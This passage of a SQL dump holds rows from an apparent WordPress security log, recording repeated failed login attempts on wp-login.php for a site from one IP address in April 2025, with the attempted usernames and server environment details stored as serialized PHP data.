";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431146.3712821;s:12:\"REQUEST_TIME\";i:1745431146;}}','13.201.132.241',0,'2025-04-23 23:29:08','1970-01-01 00:00:00'),(93959,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431146.3647289;s:12:\"REQUEST_TIME\";i:1745431146;}}','13.201.132.241',0,'2025-04-23 23:29:08','1970-01-01 00:00:00'),(93960,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431148.1313419;s:12:\"REQUEST_TIME\";i:1745431148;}}','13.201.132.241',0,'2025-04-23 23:29:09','1970-01-01 00:00:00'),(93961,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431534.0480189;s:12:\"REQUEST_TIME\";i:1745431534;}}','13.201.132.241',0,'2025-04-23 23:35:35','1970-01-01 00:00:00'),(93962,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431534.043385;s:12:\"REQUEST_TIME\";i:1745431534;}}','13.201.132.241',0,'2025-04-23 23:35:35','1970-01-01 00:00:00'),(93963,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431534.0805981;s:12:\"REQUEST_TIME\";i:1745431534;}}','13.201.132.241',0,'2025-04-23 23:35:35','1970-01-01 00:00:00'),(93964,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431534.0624931;s:12:\"REQUEST_TIME\";i:1745431534;}}','13.201.132.241',0,'2025-04-23 23:35:35','1970-01-01 00:00:00'),(93965,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431534.04583;s:12:\"REQUEST_TIME\";i:1745431534;}}','13.201.132.241',0,'2025-04-23 23:35:35','1970-01-01 00:00:00'),(93966,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431925.2356541;s:12:\"REQUEST_TIME\";i:1745431925;}}','13.201.132.241',0,'2025-04-23 23:42:08','1970-01-01 00:00:00'),(93967,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431925.232728;s:12:\"REQUEST_TIME\";i:1745431925;}}','13.201.132.241',0,'2025-04-23 23:42:08','1970-01-01 00:00:00'),(93968,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431927.1182339;s:12:\"REQUEST_TIME\";i:1745431927;}}','13.201.132.241',0,'2025-04-23 23:42:08','1970-01-01 00:00:00'),(93969,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/